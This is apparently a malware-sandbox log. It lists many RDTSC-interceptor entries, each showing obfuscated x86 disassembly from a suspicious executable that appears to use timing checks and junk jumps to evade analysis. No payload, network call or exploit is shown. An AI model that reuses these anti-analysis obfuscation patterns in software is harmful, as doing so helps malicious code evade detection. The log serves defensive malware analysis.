                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70727 second address: 4E7072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E7072C second address: 4E70793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED7550886Fh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FED75508879h 0x0000000f or esi, 511A4726h 0x00000015 jmp 00007FED75508871h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 jmp 00007FED7550886Eh 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FED7550886Ah 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70793 second address: 4E70799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E705E9 second address: 4E7068E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov eax, 79897433h 0x00000011 jmp 00007FED75508878h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007FED7550886Bh 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FED75508874h 0x00000025 adc ecx, 5B464698h 0x0000002b jmp 00007FED7550886Bh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FED75508878h 0x00000037 xor ax, F0F8h 0x0000003c jmp 00007FED7550886Bh 0x00000041 popfd 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 pushad 0x00000046 jmp 00007FED75508874h 0x0000004b push eax 0x0000004c push edx 0x0000004d mov ah, 0Dh 0x0000004f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70356 second address: 4E70373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70373 second address: 4E70385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70385 second address: 4E70389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70389 second address: 4E7038F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E7038F second address: 4E703A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, AAh 0x00000005 mov ah, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov eax, 4591B2A1h 0x00000015 popad 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E703A5 second address: 4E7041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508876h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FED75508870h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx edi, ax 0x0000001d pushfd 0x0000001e jmp 00007FED75508876h 0x00000023 or ecx, 3168E228h 0x00000029 jmp 00007FED7550886Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E801A0 second address: 4E801FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E51Bh 0x00000009 and ch, 0000006Eh 0x0000000c jmp 00007FED74F3E529h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FED74F3E520h 0x00000018 jmp 00007FED74F3E525h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E801FD second address: 4E80201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E80201 second address: 4E80207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E80207 second address: 4E80268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 1CC7h 0x00000007 push esi 0x00000008 pop edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f jmp 00007FED75508874h 0x00000014 pushfd 0x00000015 jmp 00007FED75508872h 0x0000001a sbb ecx, 0192BFD8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FED75508875h 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC000E second address: 4EC004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FED74F3E522h 0x00000012 add cx, 2E68h 0x00000017 jmp 00007FED74F3E51Bh 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [esp], ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov esi, 3988B82Dh 0x00000029 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC004A second address: 4EC00BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FED75508872h 0x0000000f sbb si, 2BF8h 0x00000014 jmp 00007FED7550886Bh 0x00000019 popfd 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ax, 1D4Bh 0x00000022 mov edx, esi 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FED7550886Fh 0x0000002f xor eax, 4D5E2C6Eh 0x00000035 jmp 00007FED75508879h 0x0000003a popfd 0x0000003b movzx esi, di 0x0000003e popad 0x0000003f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC00BF second address: 4EC00DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E529h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC00DC second address: 4EC00E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E9040F second address: 4E9043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E526h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, DD5Fh 0x00000018 popad 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E9043F second address: 4E90444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E90444 second address: 4E904A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp+08h] 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 call 00007FED74F3E522h 0x00000015 pushfd 0x00000016 jmp 00007FED74F3E522h 0x0000001b or al, 00000028h 0x0000001e jmp 00007FED74F3E51Bh 0x00000023 popfd 0x00000024 pop ecx 0x00000025 popad 0x00000026 and dword ptr [eax], 00000000h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FED74F3E522h 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70532 second address: 4E70538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70538 second address: 4E7053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E7053C second address: 4E705AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FED7550886Fh 0x00000013 add eax, 61456E6Eh 0x00000019 jmp 00007FED75508879h 0x0000001e popfd 0x0000001f mov bl, al 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007FED75508873h 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FED75508875h 0x00000031 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E705AF second address: 4E705B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E705B5 second address: 4E705B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E80EB1 second address: 4E80EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E524h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E80EC9 second address: 4E80F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FED75508876h 0x00000011 push eax 0x00000012 jmp 00007FED7550886Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FED75508876h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007FED7550886Dh 0x00000027 mov ch, 8Eh 0x00000029 popad 0x0000002a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E901E6 second address: 4E901EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E901EA second address: 4E90207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E90207 second address: 4E90272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E527h 0x00000009 adc cx, CB6Eh 0x0000000e jmp 00007FED74F3E529h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov edi, esi 0x0000001d jmp 00007FED74F3E526h 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FED74F3E51Eh 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E90272 second address: 4E90277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E90277 second address: 4E90289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 2392h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E90289 second address: 4E9028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E9028D second address: 4E90293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E90293 second address: 4E90299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB06DA second address: 4EB06DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB06DE second address: 4EB06E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB06E4 second address: 4EB07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FED74F3E51Eh 0x00000011 add ax, 0238h 0x00000016 jmp 00007FED74F3E51Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d mov ebx, 29FE7A5Ah 0x00000022 pop edi 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FED74F3E527h 0x0000002c jmp 00007FED74F3E523h 0x00000031 popfd 0x00000032 jmp 00007FED74F3E528h 0x00000037 popad 0x00000038 xchg eax, ecx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FED74F3E51Eh 0x00000040 or si, 0158h 0x00000045 jmp 00007FED74F3E51Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov eax, dword ptr [76FB65FCh] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 call 00007FED74F3E51Eh 0x00000059 pop ecx 0x0000005a pushfd 0x0000005b jmp 00007FED74F3E51Bh 0x00000060 add cx, 4CCEh 0x00000065 jmp 00007FED74F3E529h 0x0000006a popfd 0x0000006b popad 0x0000006c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB07CD second address: 4EB0842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, F1E2h 0x00000007 call 00007FED75508873h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test eax, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FED75508870h 0x0000001b sub cx, A7A8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FED75508878h 0x0000002c jmp 00007FED75508875h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB0842 second address: 4EB0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB0848 second address: 4EB084C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB084C second address: 4EB08EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FEDE6FC1628h 0x0000000e jmp 00007FED74F3E51Fh 0x00000013 mov ecx, eax 0x00000015 jmp 00007FED74F3E526h 0x0000001a xor eax, dword ptr [ebp+08h] 0x0000001d jmp 00007FED74F3E521h 0x00000022 and ecx, 1Fh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FED74F3E51Ch 0x0000002c jmp 00007FED74F3E525h 0x00000031 popfd 0x00000032 mov edi, esi 0x00000034 popad 0x00000035 ror eax, cl 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FED74F3E51Fh 0x00000040 jmp 00007FED74F3E523h 0x00000045 popfd 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB08EB second address: 4EB08F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB08F1 second address: 4EB08F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB08F5 second address: 4EB0945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007FED7550886Eh 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [00541014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007FED79EB9764h 0x0000002c push FFFFFFFEh 0x0000002e pushad 0x0000002f pushad 0x00000030 push ecx 0x00000031 pop ebx 0x00000032 mov esi, 02C753BFh 0x00000037 popad 0x00000038 mov edx, eax 0x0000003a popad 0x0000003b pop eax 0x0000003c jmp 00007FED7550886Eh 0x00000041 ret 0x00000042 nop 0x00000043 push eax 0x00000044 call 00007FED79EB977Ch 0x00000049 mov edi, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB0945 second address: 4EB0949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB0949 second address: 4EB094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB094D second address: 4EB0953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB0953 second address: 4EB09A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508870h 0x0000000f push eax 0x00000010 jmp 00007FED7550886Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FED75508875h 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB09A0 second address: 4EB09C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED74F3E527h 0x00000008 pop esi 0x00000009 mov cx, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB09C9 second address: 4EB09CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB09CD second address: 4EB09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB09D1 second address: 4EB09D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB09D7 second address: 4EB09DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB09DD second address: 4EB09E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB09E1 second address: 4EB09FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB09FF second address: 4EB0A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB0A03 second address: 4EB0A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB0A16 second address: 4EB0A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508874h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EB0A2E second address: 4EB0A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60011 second address: 4E60021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60021 second address: 4E60025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60025 second address: 4E60058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FED7550886Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FED75508870h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edx, ax 0x0000001e mov cl, 52h 0x00000020 popad 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60058 second address: 4E60073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E527h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60073 second address: 4E600CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FED7550886Eh 0x00000012 sbb ecx, 04A10E08h 0x00000018 jmp 00007FED7550886Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 jmp 00007FED75508876h 0x00000025 push eax 0x00000026 pushad 0x00000027 push edi 0x00000028 mov edi, esi 0x0000002a pop esi 0x0000002b mov esi, edx 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov edx, ecx 0x00000034 mov ah, B5h 0x00000036 popad 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E600CA second address: 4E600D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E600D0 second address: 4E600EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, dl 0x0000000e call 00007FED7550886Eh 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E600EE second address: 4E60109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60109 second address: 4E6010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E6010D second address: 4E60129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
